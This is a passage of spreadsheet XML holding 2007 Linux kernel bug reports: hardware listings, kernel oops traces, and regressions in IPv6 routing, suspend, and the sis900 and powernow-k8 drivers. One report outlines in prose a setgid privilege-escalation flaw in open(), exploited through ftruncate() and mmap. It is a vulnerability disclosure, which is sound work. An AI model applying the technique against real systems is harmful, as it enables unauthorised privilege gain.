Corporation CK8S USB Controller (rev a1) 00:02.2 USB Controller: nVidia Corporation nForce3 EHCI USB 2.0 Controller (rev a2) 00:05.0 Bridge: nVidia Corporation CK8S Ethernet Controller (rev a2) 00:06.0 Multimedia audio controller: nVidia Corporation nForce3 250Gb AC'97 Audio Controller (rev a1) 00:08.0 IDE interface: nVidia Corporation CK8S Parallel ATA Controller (v2.5) (rev a2) 00:0a.0 IDE interface: nVidia Corporation CK8S Serial ATA Controller (v2.5) (rev a2) 00:0b.0 PCI bridge: nVidia Corporation nForce3 250Gb AGP Host to PCI Bridge (rev a2) 00:0e.0 PCI bridge: nVidia Corporation nForce3 250Gb PCI-to-PCI Bridge (rev a2) 00:18.0 Host bridge: Advanced Micro Devices [AMD] K8 [Athlon64/Opteron] HyperTransport Technology Configuration 00:18.1 Host bridge: Advanced Micro Devices [AMD] K8 [Athlon64/Opteron] Address Map 00:18.2 Host bridge: Advanced Micro Devices [AMD] K8 [Athlon64/Opteron] DRAM Controller 00:18.3 Host bridge: Advanced Micro Devices [AMD] K8 [Athlon64/Opteron] Miscellaneous Control 01:00.0 VGA compatible controller: ATI Technologies Inc RV280 [Radeon 9200 SE] (rev 01) 02:0a.0 Ethernet controller: 3Com Corporation 3c905B 100BaseTX [Cyclone] (rev 24) 02:0b.0 FireWire (IEEE 1394): VIA Technologies, Inc. IEEE 1394 Host Controller (rev 80) 02:0c.0 Mass storage controller: Silicon Image, Inc. SiI 3114 [SATALink/SATARaid] Serial ATA Controller (rev 02) server:/home/matthieu# lsmod Module Size Used by nfs 242008 0 nfsd 253320 17 exportfs 6080 1 nfsd lockd 65904 3 nfs,nfsd nfs_acl 4160 2 nfs,nfsd sunrpc 172840 13 nfs,nfsd,lockd,nfs_acl ppdev 9864 0 lp 13128 0 cpufreq_powersave 2368 1 button 9568 0 ac 6536 0 battery 11720 0 ext2 63952 1 xfs 485096 7 radeonfb 103552 1 fb_ddc 3136 1 radeonfb i2c_algo_bit 8328 1 radeonfb it87 23632 0 hwmon_vid 3328 1 it87 i2c_isa 6784 1 it87 eeprom 8656 0 powernow_k8 11032 1 freq_table 5320 1 powernow_k8 sbp2 23940 0 loop 17872 0 analog 11424 0 snd_intel8x0 36200 0 snd_mpu401 9576 0 snd_mpu401_uart 8896 1 snd_mpu401 snd_ac97_codec 110936 1 snd_intel8x0 i2c_nforce2 6592 0 snd_rawmidi 26080 1 snd_mpu401_uart snd_seq_device 9044 1 snd_rawmidi psmouse 39760 0 gameport 16784 1 analog shpchp 34460 0 pci_hotplug 16520 1 shpchp ac97_bus 3136 1 snd_ac97_codec i2c_core 24216 7 radeonfb,fb_ddc,i2c_algo_bit,it87,i2c_isa,eeprom,i2c_nforce2 parport_pc 36968 1 parport 39308 3 ppdev,lp,parport_pc serio_raw 7748 0 pcspkr 3456 0 snd_pcm 82572 2 snd_intel8x0,snd_ac97_codec snd_timer 23560 1 snd_pcm snd 60456 8 snd_intel8x0,snd_mpu401,snd_mpu401_uart,snd_ac97_codec,snd_rawmidi,snd_seq_device,snd_pcm,snd_timer soundcore 8928 1 snd snd_page_alloc 10768 2 snd_intel8x0,snd_pcm k8temp 6656 0 evdev 11328 0 ext3 130640 1 jbd 57392 1 ext3 mbcache 9480 2 ext2,ext3 dm_mirror 20416 0 dm_snapshot 17032 0 dm_mod 59312 19 dm_mirror,dm_snapshot raid456 118560 1 md_mod 76188 3 raid456 xor 6288 1 raid456 ide_cd 40672 0 cdrom 36072 1 ide_cd ide_disk 16832 3 sd_mod 22040 10 pata_amd 15584 0 sata_nv 22468 1 ata_generic 9860 0 floppy 61640 0 sata_sil 13704 4 ohci1394 34312 0 libata 119656 4 pata_amd,sata_nv,ata_generic,sata_sil scsi_mod 155544 3 sbp2,sd_mod,libata ieee1394 100408 2 sbp2,ohci1394 3c59x 46388 0 mii 6272 1 3c59x generic 6468 0 [permanent] amd74xx 15728 0 [permanent] ide_core 139744 4 ide_cd,ide_disk,generic,amd74xx forcedeth 46280 0 ehci_hcd 32780 0 ohci_hcd 20932 0 thermal 16400 0 processor 27004 2 powernow_k8,thermal fan 6152 0</t>
  </si>
  <si>
    <t>2.6.20 cannot route packets outside tunnel</t>
  </si>
  <si>
    <t>2.6.20.9</t>
  </si>
  <si>
    <t>2007-04-27 16:01 UTC</t>
  </si>
  <si>
    <t>2009-03-23 10:59 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did *NOT* occur: 2.6.19.7 Distribution: Debian Etch 4.0 Hardware Environment: i386 VIA Samuel 2 700mhz Software Environment: Debian Etch Problem Description: I am using an IPv6 tunnel broker (SixXs) which is using aiccu (dynamic IPv4 address using heartbeat to get in sync with IPv6 tunnel to SixXS). When using 2.6.20.x it doesn't route packets outside the tunnel anymore. This means that from my gateway, i can ping my local interface and my remote one but not a single other IPv6 address. When trying to traceroute or send IPv6 packets from any other machine on my network to an outside IPv6 address, i keep getting a network unreachable message. This was tested against 2.6.20.{5,7,8,9} and also 2.6.19.6/7. It works perfectly on any 2.6.19.x kernel or previous but fails under 2.6.20.x I made a diff in the IPv6 stack between 19 and 20 but my programming skills are clearly lacking :( Steps to reproduce: Compile with IPv6 settings that I am including with this bug report, 2.6.19 works, 2.6.20 doesn't.</t>
  </si>
  <si>
    <t>drivers/media/video/cx88/cx88-mpeg.c debug Message</t>
  </si>
  <si>
    <t>2.6.21.1</t>
  </si>
  <si>
    <t>2007-04-27 23:54 UTC</t>
  </si>
  <si>
    <t>2007-06-22 13:34 UTC</t>
  </si>
  <si>
    <t>I get many of this debug messages in my dvb-s card (every 5 min.): Apr 27 23:02:14 video kernel: cx88[1]/2-mpeg: cx8802_timeout Apr 27 23:07:27 video kernel: cx88[1]/2-mpeg: cx8802_timeout lspci: 00:10.0 Multimedia video controller: Conexant CX23880/1/2/3 PCI Video and Audio Decoder (rev 05) 00:10.1 Multimedia controller: Conexant CX23880/1/2/3 PCI Video and Audio Decoder [Audio Port] (rev 05) 00:10.2 Multimedia controller: Conexant CX23880/1/2/3 PCI Video and Audio Decoder [MPEG Port] (rev 05) 00:10.4 Multimedia controller: Conexant CX23880/1/2/3 PCI Video and Audio Decoder [IR Port] (rev 05) i think this are debug messages and the 0 should be a 1???: --- cx88-mpeg.c 2007-04-28 08:46:09.000000000 +0200 +++ cx88-mpeg.c-2 2007-04-28 08:34:06.000000000 +0200 @@ -313,7 +313,7 @@ { struct cx8802_dev *dev = (struct cx8802_dev*)data; - dprintk(0, "%s\n",__FUNCTION__); + dprintk(1, "%s\n",__FUNCTION__); if (debug) cx88_sram_channel_dump(dev-&gt;core, &amp;cx88_sram_channels[SRAM_CH28]);</t>
  </si>
  <si>
    <t>Allow powersave as default governor</t>
  </si>
  <si>
    <t>2007-04-28 01:30 UTC</t>
  </si>
  <si>
    <t>Reimar D</t>
  </si>
  <si>
    <t>2011-07-30 05:24 UTC</t>
  </si>
  <si>
    <t>I am using since over a year this patch (I'll attach it as soon as I find out how) to allow selecting powersave as cpufreq governor. This means less annoying fan noise during bootup, esp. when fsck runs. Worked flawlessly for me (64 bit kernel on an Athlon64 3200+). The patch was created against 2.6.16.16 but applies and works with 2.6.21.1. Unfortunately this method for some reason does not work for making the other governors available per default, they do not work and are stuck at max. frequency. This patch was sent both to the supposed maintainer and cpufreq list, but received no useful response, so I decided to put it hear to make it more easily accessible (hope this is not considered misuse of this bugzilla). Cpufreq list mail: Date: Wed, 31 May 2006 19:05:30 +0200 Subject: [PATCH] allow powersave as default governor Message-ID: &lt;20060531170530.GA9967@rz.uni-karlsruhe.de&gt;</t>
  </si>
  <si>
    <t>2.6.21 regression: BUG: scheduling while atomic: kacpid - Acer Travelmate 4001 lmi, Acer TM660</t>
  </si>
  <si>
    <t>2007-04-28 01:34 UTC</t>
  </si>
  <si>
    <t>2008-01-12 21:25 UTC</t>
  </si>
  <si>
    <t>acpi_power-thermal</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did *NOT* occur: Distribution: Debian sid Hardware Environment: Acer Travelmate 4001 lmi, intel centrino 1,5 Ghz Software Environment: Problem Description: When the thermal module is loaded, I get plenty of problems: kernel bug, kernel oopses and also sometime kernel panic. Not loading the thermal module seems to solve the problem, but I am not totally sure that it's enough to avoid my computer to freeze. I have added an extract of kernel log. It contains around 2000 lines of acpi related errors ! Steps to reproduce: simply trying to use the computer when the thermal modules is loaded !</t>
  </si>
  <si>
    <t>Boomarang, pci_set_power_state log spamming</t>
  </si>
  <si>
    <t>2.6.21 and earlier</t>
  </si>
  <si>
    <t>2007-04-28 05:44 UTC</t>
  </si>
  <si>
    <t>2011-07-30 05:26 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did *NOT* occur: Distribution: Debian unstable, but distribution independent. Hardware Environment: x86 Software Environment: Problem Description: This has been reported else where, eg http://lkml.org/lkml/2007/3/5/331 http://lists.openwall.net/netdev/2006/12/01/56 http://www.mail-archive.com/debian-user@lists.debian.org/msg466124.html Two of the above reports include patches to fix the problem. It would be nice if they got evaluated and committed to mainline.</t>
  </si>
  <si>
    <t>Soft lockup on CPU0 when resuming from suspension to ram, related to acpi processor module</t>
  </si>
  <si>
    <t>2007-04-28 08:46 UTC</t>
  </si>
  <si>
    <t>Giorgio Lando</t>
  </si>
  <si>
    <t>2007-11-14 00:01 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did *NOT* occur: 2.6.20 Distribution: archlinux (but the problem occurs also with a vanilla kernel) Hardware Environment: acer 1644WLMi, with an Intel Centrino 2000 MhZ Problem Description: When I resume the laptop from a suspension to ram, I get a soft lockup. If the module 'processor' is not loaded, the laptop resume normally. On the contrary compiling the processor acpi module into the kernel does not solve the problem. This happens with a vanilla kernel. 2.6.21.1 does not solve it. This is what I can see in the system log: Apr 28 17:18:37 clarabella BUG: soft lockup detected on CPU#0! Apr 28 17:18:37 clarabella [&lt;c01524f8&gt;] softlockup_tick+0xa8/0x110 Apr 28 17:18:37 clarabella [&lt;c0132853&gt;] update_process_times+0x33/0x80 Apr 28 17:18:37 clarabella [&lt;c0144a1b&gt;] tick_sched_timer+0x5b/0xc0 Apr 28 17:18:37 clarabella [&lt;c0140a3d&gt;] hrtimer_interrupt+0x13d/0x1d0 Apr 28 17:18:37 clarabella [&lt;c01189f2&gt;] smp_apic_timer_interrupt+0x52/0x90 Apr 28 17:18:37 clarabella [&lt;c034387f&gt;] preempt_schedule_irq+0x3f/0x60 Apr 28 17:18:37 clarabella [&lt;c0104d30&gt;] apic_timer_interrupt+0x28/0x30 Apr 28 17:18:37 clarabella [&lt;c024f141&gt;] cfb_imageblit+0x521/0x580 Apr 28 17:18:37 clarabella [&lt;c0141f88&gt;] clocksource_get_next+0x38/0x40 Apr 28 17:18:37 clarabella [&lt;c01400b2&gt;] ktime_get_ts+0x22/0x60 Apr 28 17:18:37 clarabella [&lt;c0143432&gt;] clockevents_program_event+0x92/0x110 Apr 28 17:18:37 clarabella [&lt;c024cc06&gt;] bit_putcs+0x576/0x600 Apr 28 17:18:37 clarabella [&lt;c024dca0&gt;] bitfill_aligned+0x0/0x100 Apr 28 17:18:37 clarabella [&lt;c024b72b&gt;] fbcon_switch+0x41b/0x5f0 Apr 28 17:18:37 clarabella [&lt;c0246efd&gt;] fbcon_putcs+0x19d/0x2e0 Apr 28 17:18:37 clarabella [&lt;c024c690&gt;] bit_putcs+0x0/0x600 Steps to reproduce: suspend to ram with the acpi support for the processor in the kernel or as a loaded module; try to resume.</t>
  </si>
  <si>
    <t>Hard Lock Subsequent to Boot</t>
  </si>
  <si>
    <t>2.6.21/2,6,21.1</t>
  </si>
  <si>
    <t>2007-04-28 09:34 UTC</t>
  </si>
  <si>
    <t>David Cary Hart</t>
  </si>
  <si>
    <t>2007-05-01 13:53 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did *NOT* occur: 2.6.20.8 Distribution: Fedora Core 6 Hardware Environment: Sony Vaio 2.4gh/512 mb 00:00.0 Host bridge: Silicon Integrated Systems [SiS] 645xx (rev 03) 00:01.0 PCI bridge: Silicon Integrated Systems [SiS] SG86C202 00:02.0 ISA bridge: Silicon Integrated Systems [SiS] SiS963 [MuTIOL Media IO] (rev 14) 00:02.1 SMBus: Silicon Integrated Systems [SiS] SiS961/2 SMBus Controller 00:02.5 IDE interface: Silicon Integrated Systems [SiS] 5513 [IDE] 00:02.6 Modem: Silicon Integrated Systems [SiS] AC'97 Modem Controller (rev a0) 00:02.7 Multimedia audio controller: Silicon Integrated Systems [SiS] AC'97 Sound Controller (rev a0) 00:03.0 USB Controller: Silicon Integrated Systems [SiS] USB 1.0 Controller (rev 0f) 00:03.1 USB Controller: Silicon Integrated Systems [SiS] USB 1.0 Controller (rev 0f) 00:03.2 USB Controller: Silicon Integrated Systems [SiS] USB 1.0 Controller (rev 0f) 00:03.3 USB Controller: Silicon Integrated Systems [SiS] USB 2.0 Controller 00:04.0 Ethernet controller: Silicon Integrated Systems [SiS] SiS900 PCI Fast Ethernet (rev 90) 00:07.0 Ethernet controller: Atheros Communications, Inc. AR5212 802.11abg NIC (rev 01) 00:0a.0 CardBus bridge: Ricoh Co Ltd RL5c476 II (rev aa) 00:0a.1 CardBus bridge: Ricoh Co Ltd RL5c476 II (rev aa) 00:0a.2 FireWire (IEEE 1394): Ricoh Co Ltd R5C552 IEEE 1394 Controller (rev 02) 01:00.0 VGA compatible controller: nVidia Corporation NV17 [GeForce4 420 Go] (rev a3) Software Environment: KDE. Kernel compiled with full debugging Standard nv driver - NOT nvidia. Problem Description: Kernel boots. X starts. Hard lock occurs immediately on launching an application. Complete freeze stops logging (no panic or error messages. No debug information whatsoever. Neither SysReq nor alt-ctl-del are responsive. Steps to reproduce: Boot into X. Launch any application (web, mail client, etc).</t>
  </si>
  <si>
    <t>Card is not detected if inserted before tifm_sd</t>
  </si>
  <si>
    <t>v2.6.21.1 + tifm-0.8e</t>
  </si>
  <si>
    <t>2007-04-28 09:38 UTC</t>
  </si>
  <si>
    <t>Sergey Yanovich</t>
  </si>
  <si>
    <t>2007-10-19 01:58 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did *NOT* occur: n/a Distribution: n/a Hardware Environment: i386, Pentium M, Sony laptop Software Environment: console shell Problem Description: If a card is in the slot when the tifm_sd is loaded, the card is not recognized. It renders udev hotplug script useless. Steps to reproduce: 1. unload tifm_sd like 'modprobe -r tifm_sd'; 2. insert a mmc/sd card; 3. load tifm_sd like 'modprobe tifm_sd'. Expected result: /dev/mmcblk* created. Actual result: nothing happens. I will attach a script that fails on this bug.</t>
  </si>
  <si>
    <t>Documentation for readv(2) is inaccurate</t>
  </si>
  <si>
    <t>2007-04-28 15:42 UTC</t>
  </si>
  <si>
    <t>Kyle Sluder</t>
  </si>
  <si>
    <t>2007-05-09 22:49 UTC</t>
  </si>
  <si>
    <t>The documentation for readv(2) states that ``The readv() function reads count blocks from the file associated with the file descriptor fd into the multiple buffers described by vector.'' This is incorrect; readv() uses the ``count'' parameter to determine the number of iovec structures exist at *iov. Otherwise there would be no way to specify multiple buffers, which is the point of readv(). Distribution: Ubuntu 6.10 Edgy Eft</t>
  </si>
  <si>
    <t>eth1394: cannot allocate transaction labels under heavy traffic</t>
  </si>
  <si>
    <t>2007-04-29 05:42 UTC</t>
  </si>
  <si>
    <t>2007-07-05 11:59 UTC</t>
  </si>
  <si>
    <t>(got the report via personal e-mail) Hardware Environment: 2.0 GHz dual core PC, 1394b hardware Software Environment: eth1394 between two Linux PCs, tested with netperf -n 2 -H ... (http://www.netperf.org/) Problem Description: Apr 25 10:51:24 localhost kernel: 00:1023 Apr 25 10:51:24 localhost kernel: eth1394: No more tlabels left while sending to node 0-0:1023 The reason is that more than 64 packets are attempted to be transmitted before the split transaction of the first packet is completed. AFAICT it may result in dropped IP packets.</t>
  </si>
  <si>
    <t>kernel boot hangs due to broken PCIe bridge prefmem 64-bit support</t>
  </si>
  <si>
    <t>2.6.15,2.6.20</t>
  </si>
  <si>
    <t>2007-04-29 13:28 UTC</t>
  </si>
  <si>
    <t>Michael Werner</t>
  </si>
  <si>
    <t>2008-04-23 18:14 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did *NOT* occur: Distribution:Ubuntu Hardware Environment:amd64, Tyan S2891 Software Environment:feisty, 2.6.20-15-server, linuxbios v2 Problem Description: Machine hangs during kernel boot. It is caused by the PCIe bridge prefmem base upper32 and limit upper32 registers being zeroed in drivers/pci/setup-bus.c so that the 40-bit phys addr of the prefmem window assigned by the bios is truncated to a range already allocated for non-prefetch ranges. The machine boots when the code which zeroes the base upper32 and limit upper 32 registers is removed. Steps to reproduce: Enable 64-bit prefmem support in bios and plug an Nvidia card into PCIe slot.</t>
  </si>
  <si>
    <t>Strange messages in dmesg about sata_via</t>
  </si>
  <si>
    <t>2.6.21 vanilla</t>
  </si>
  <si>
    <t>2007-04-30 13:13 UTC</t>
  </si>
  <si>
    <t>Yaroslav Isakov</t>
  </si>
  <si>
    <t>2007-08-26 09:33 UTC</t>
  </si>
  <si>
    <t>It was in 2.6.20 also (and maybe older, I can't remember) Distribution: Gentoo x86 Hardware Environment: A8V Deluxe MoBo, Maxtor 6L200S0 Problem Description: I see a strange lines in dmesg ATA: abnormal status 0x7F on port 0x0001d007 ATA: abnormal status 0x7F on port 0x0001d007 ATA: abnormal status 0x7F on port 0x0001c407 and duplicating these lines: SCSI device sda: 398297088 512-byte hdwr sectors (203928 MB) sda: Write Protect is off sda: Mode Sense: 00 3a 00 00 SCSI device sda: write cache: enabled, read cache: enabled, doesn't support DPO or FUA Please, help!</t>
  </si>
  <si>
    <t>2.6.21.1 and Apple MacBook - Problems during suspend-to-(disk|ram)</t>
  </si>
  <si>
    <t>2007-05-02 07:15 UTC</t>
  </si>
  <si>
    <t>Marvin Stark</t>
  </si>
  <si>
    <t>2007-06-01 16:14 UTC</t>
  </si>
  <si>
    <t>Distribution: Debian GNU/Linux Etch (4.0) Hardware Environment: Intel(R) Core(TM)2 CPU T5600 @ 1.83GHz lspci: 00:00.0 Host bridge: Intel Corporation Mobile 945GM/PM/GMS/940GML and 945GT Express Memory Controller Hub (rev 03) 00:02.0 VGA compatible controller: Intel Corporation Mobile 945GM/GMS/940GML Express Integrated Graphics Controller (rev 03) 00:02.1 Display controller: Intel Corporation Mobile 945GM/GMS/940GML Express Integrated Graphics Controller (rev 03) 00:07.0 Performance counters: Intel Corporation Unknown device 27a3 (rev 03) 00:1b.0 Audio device: Intel Corporation 82801G (ICH7 Family) High Definition Audio Controller (rev 02) 00:1c.0 PCI bridge: Intel Corporation 82801G (ICH7 Family) PCI Express Port 1 (rev 02) 00:1c.1 PCI bridge: Intel Corporation 82801G (ICH7 Family) PCI Express Port 2 (rev 02) 00:1d.0 USB Controller: Intel Corporation 82801G (ICH7 Family) USB UHCI #1 (rev 02) 00:1d.1 USB Controller: Intel Corporation 82801G (ICH7 Family) USB UHCI #2 (rev 02) 00:1d.2 USB Controller: Intel Corporation 82801G (ICH7 Family) USB UHCI #3 (rev 02) 00:1d.3 USB Controller: Intel Corporation 82801G (ICH7 Family) USB UHCI #4 (rev 02) 00:1d.7 USB Controller: Intel Corporation 82801G (ICH7 Family) USB2 EHCI Controller (rev 02) 00:1e.0 PCI bridge: Intel Corporation 82801 Mobile PCI Bridge (rev e2) 00:1f.0 ISA bridge: Intel Corporation 82801GBM (ICH7-M) LPC Interface Bridge (rev 02) 00:1f.1 IDE interface: Intel Corporation 82801G (ICH7 Family) IDE Controller (rev 02) 00:1f.2 IDE interface: Intel Corporation 82801GBM/GHM (ICH7 Family) Serial ATA Storage Controller IDE (rev 02) 00:1f.3 SMBus: Intel Corporation 82801G (ICH7 Family) SMBus Controller (rev 02) 01:00.0 Ethernet controller: Marvell Technology Group Ltd. 88E8053 PCI-E Gigabit Ethernet Controller (rev 22) 02:00.0 Network controller: Atheros Communications, Inc. Unknown device 0024 (rev 01) 03:03.0 FireWire (IEEE 1394): Agere Systems FW323 (rev 61) Software Environment: s2ram, s2disk, sysfs Problem Description: Every time I try to suspend my MacBook to disk (platform modus) I get following message before the system freezes: ACPI: PCI interrupt for device 0000:00.1f.2 disabled As 00:1f.2 is my S-ATA controller, I think that the harddisk can not be suspended. If I change the suspend modus to "shutdown", The system will suspend without any problems. But only to _disk_. To ram also fails with that option. If you need more data/details to this problem please let me know. PS: DISABLE_CONSOLE_SUSPEND is enabled. Regards, Marvin Stark</t>
  </si>
  <si>
    <t>open() call allows setgid bit when user is not in new file's group</t>
  </si>
  <si>
    <t>2007-05-02 12:56 UTC</t>
  </si>
  <si>
    <t>David Watson</t>
  </si>
  <si>
    <t>2008-09-26 05:51 UTC</t>
  </si>
  <si>
    <t>When creating a file, open()/creat() allows the setgid bit to be set via the mode argument even when, due to the bsdgroups mount option or the file being created in a setgid directory, the new file's group is one which the user is not a member of. The user can then use ftruncate() and memory-mapped I/O to turn the new file into an arbitrary binary and thus gain the privileges of this group, since these operations do not clear the setgid bit.</t>
  </si>
  <si>
    <t>powernow-k8: Processor cpuid 70ff1 not supported on Athlon64 3800+ AM2 which supports Cool'n'Quiet</t>
  </si>
  <si>
    <t>2007-05-03 03:10 UTC</t>
  </si>
  <si>
    <t>Tomasz Ostrowski</t>
  </si>
  <si>
    <t>2007-05-17 14:11 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did *NOT* occur: unknown Distribution: vanilla kernel copiled with FC6 gcc-4.1.1-51.fc6 Hardware Environment: AMD Athlon64 3800+ AM2 on Gigabyte GA-M61PM-S2, latest BIOS Software Environment: Fedora Core 6 Problem Description: Powernow-k8 driver does not load - it shows a message powernow-k8: Processor cpuid 70ff1 not supported on my new AMD Athlon64 3800+ on AM2 connector (Family: 15 Model: 15 Stepping: 1), which does support Cool'n'Quiet. Because of this I cannot use cpufreq in my system. I think it triggers a check (eax &amp; CPUID_XMOD) &gt; CPUID_XMOD_REV_G) from row 524 in arch/i386/kernel/cpu/cpufreq/powernow-k8.c. Macros CPUID_XMOD and CPUID_XMOD_REV_G are defined in ./arch/i386/kernel/cpu/cpufreq/powernow-k8.h: #define CPUID_XMOD 0x000f0000 /* extended model */ #define CPUID_XMOD_REV_G 0x00060000 Steps to reproduce: 1. compile kernel with powernow-k8 support 2. boot on Athlon64 3800+ AM2</t>
  </si>
  <si>
    <t>AMD64 specific: PCMCIA CompactFlash reader fails to start, kernel oops</t>
  </si>
  <si>
    <t>2007-05-03 06:15 UTC</t>
  </si>
  <si>
    <t>Andrey Zaitsev</t>
  </si>
  <si>
    <t>2007-10-19 11:30 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did *NOT* occur: No info Distribution: Ubuntu 7.04 amd64 Hardware Environment: Acer Aspire 5101 AWLMi Software Environment: Ubuntu Linux 7.04 AMD64 Problem Description: Probably this bug is a dublicate of #7711, but the dmesg output differs somehow. So when inserting pcmcia cf reader with a cf card in it I get the following dmesg output: [ 267.670692] pccard: PCMCIA card inserted into slot 0 [ 267.670698] cs: memory probe 0x0c0000-0x0fffff: excluding 0xc0000-0xcffff 0xe0000-0xfffff [ 267.675119] cs: memory probe 0x30000000-0x33ffffff: excluding 0x30000000- 0x33ffffff [ 267.675137] cs: memory probe 0x60000000-0x60ffffff: clean. [ 267.683202] cs: memory probe 0xa0000000-0xa0ffffff: clean. [ 267.691279] cs: memory probe 0xd0200000-0xd02fffff: excluding 0xd0200000- 0xd021ffff [ 267.698541] pcmcia: registering new device pcmcia0.0 [ 267.913779] Unable to handle kernel NULL pointer dereference at 0000000000000000 RIP: [ 267.913784] [&lt;ffffffff80222ef2&gt;] dma_alloc_coherent+0x52/0x240 [ 267.913792] PGD 18c12067 PUD 18c16067 PMD 0 [ 267.913795] Oops: 0000 [1] SMP [ 267.913798] CPU 0 [ 267.913799] Modules linked in: pata_pcmcia wlan_tkip ipv6 binfmt_misc rfcomm l2cap bluetooth fglrx(P) ppdev powernow_k8 cpufreq_conservative cpufreq_stats cpufreq_ondemand freq_table cpufreq_userspace cpufreq_powersave dev_acpi tc1100_wmi sony_acpi pcc_acpi sbs i2c_ec dock container asus_acpi button video batt ery ac backlight parport_pc lp parport fuse joydev pcmcia snd_hda_intel snd_hda_codec snd_pcm_oss snd_mixer_oss snd_pcm snd_seq_dummy snd_seq_oss snd_seq_mid i snd_rawmidi snd_seq_midi_event snd_seq yenta_socket rsrc_nonstatic pcmcia_core snd_timer snd_seq_device wlan_scan_sta sdhci ath_rate_sample pcspkr psmouse k8temp mmc_core serio_raw i2c_piix4 ath_pci wlan snd soundcore i2c_core shpchp pci_hotplug snd_page_alloc ath_hal(P) af_packet tsdev evdev ext3 jbd mbcache 8 139cp ide_cd cdrom ide_disk atiixp generic 8139too mii ehci_hcd ata_generic libata scsi_mod ohci_hcd usbcore thermal processor fan fbcon tileblit font bitbli t softcursor vesafb cfbcopyarea cfbimgblt cfbfillrect capability commoncap [ 267.913850] Pid: 5809, comm: modprobe Tainted: P 2.6.20-15-generic #2 [ 267.913853] RIP: 0010:[&lt;ffffffff80222ef2&gt;] [&lt;ffffffff80222ef2&gt;] dma_alloc_coherent+0x52/0x240 [ 267.913860] RSP: 0000:ffff810001869748 EFLAGS: 00010206 [ 267.913862] RAX: 0000000000000000 RBX: 00000000000010d0 RCX: 00000000000010d4 [ 267.913865] RDX: 00000000ffffffff RSI: 0000000000000800 RDI: ffff810005c9a0c0 [ 267.913868] RBP: 00000000000000d0 R08: 0000000000000000 R09: ffff810005f9bc80 [ 267.913871] R10: 00000000fffffffc R11: 0000000000000001 R12: 00000000000007ff [ 267.913874] R13: 00000000ffffffff R14: ffff810005c9a0c0 R15: 0000000000000800 [ 267.913878] FS: 00002b2ea423a6f0(0000) GS:ffffffff8054e000(0000) knlGS:0000000000000000 [ 267.913881] CS: 0010 DS: 0000 ES: 0000 CR0: 000000008005003b [ 267.913883] CR2: 0000000000000000 CR3: 0000000018d2a000 CR4: 00000000000006e0 [ 267.913887] Process modprobe (pid: 5809, threadinfo ffff810001868000, task ffff81001bc93040) [ 267.913889] Stack: ffff810018ce0558 ffff810005f9bc98 00000000000000d0 0000000000000000 [ 267.913895] ffff810018ce0558 0000000000000800 ffff810005c9a0c0 ffffffff803aa35b [ 267.913899] 0000000000000002 ffff810018ce0520 ffff810005c9a0c0 000000000001a10e [ 267.913903] Call Trace: [ 267.913915] [&lt;ffffffff803aa35b&gt;] dmam_alloc_coherent+0x5b/0xb0 [ 267.913940] [&lt;ffffffff8809ab46&gt;] :libata:ata_port_start+0x26/0x70 [ 267.913957] [&lt;ffffffff8809f70b&gt;] :libata:ata_device_add+0x23b/0x540 [ 267.913974] [&lt;ffffffff884be4dc&gt;] :pata_pcmcia:pcmcia_init_one+0x47c/0x4f0 [ 267.914093] [&lt;ffffffff80309ff9&gt;] sysfs_make_dirent+0x29/0xb0 [ 267.914106] [&lt;ffffffff88314936&gt;] :pcmcia:pcmcia_device_probe+0xd6/0x150 [ 267.914118] [&lt;ffffffff803a6ad5&gt;] really_probe+0xe5/0x190 [ 267.914126] [&lt;ffffffff803a6dac&gt;] __driver_attach+0x7c/0xd0 [ 267.914132] [&lt;ffffffff803a6d30&gt;] __driver_attach+0x0/0xd0 [ 267.914136] [&lt;ffffffff803a5d29&gt;] bus_for_each_dev+0x49/0x80 [ 267.914147] [&lt;ffffffff803a612e&gt;] bus_add_driver+0x7e/0x1e0 [ 267.914156] [&lt;ffffffff802ac395&gt;] sys_init_module+0x1905/0x1ab0 [ 267.914176] [&lt;ffffffff802315a1&gt;] __up_write+0x21/0x130 [ 267.914193] [&lt;ffffffff8026111e&gt;] system_call+0x7e/0x83 [ 267.914206] [ 267.914207] [ 267.914208] Code: 4c 23 28 49 39 d5 0f 46 d9 49 c1 ec 0b 90 4c 89 e0 ba ff ff [ 267.914216] RIP [&lt;ffffffff80222ef2&gt;] dma_alloc_coherent+0x52/0x240 [ 267.914221] RSP &lt;ffff810001869748&gt; [ 267.914223] CR2: 0000000000000000 [ 267.914225] Please fix it. Steps to reproduce: plug a pcmcia compact flash reader in a pcmcia slot, and inspect dmesg.</t>
  </si>
  <si>
    <t>sis900.c kernel panic on 2.6.21 mainline (vanilla source)</t>
  </si>
  <si>
    <t>2007-05-03 13:46 UTC</t>
  </si>
  <si>
    <t>Joshua Newton</t>
  </si>
  <si>
    <t>2007-06-05 21:57 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did *NOT* occur: 2.6.20.11 Distribution: Gentoo 2006.1 Hardware Environment: UP 1.4GHz Tualatin on SiS630 (T?), 1GB RAM Software Environment: Vanilla 2.6.21, glibc 2.5, gcc 4.1.2 Problem Description: Reproducible kernel panic on use of the sis900 driver. Steps to reproduce: Load sis900.ko, do something (anything) that attempts to push packets over it. Initial driver load does not cause problems, but the first attempt to send traffic over the iface will panic the kernel. Tried with and without dynamic ticks. Interesting note: driver load and *no* use will not cause a panic, but system will fail to shut down and reboot, later on. Kernel will make it past remounting fses R/O, then system halts. Other note: tried vanilla and gentoo-sources 2.6.20-xx kernels without being able to produce panics. Presently using sys-kernel/gentoo-sources-2.6.20-r7 (mainline 2.6.20.9). Happy to provide any other useful information, but not sure how to provide output from the panic.</t>
  </si>
  <si>
    <t>USB device keeps reseting while using ehci_hcd</t>
  </si>
  <si>
    <t>2007-05-05 11:25 UTC</t>
  </si>
  <si>
    <t>Jakub Schmidtke</t>
  </si>
  <si>
    <t>2007-06-09 13:58 UTC</t>
  </si>
  <si>
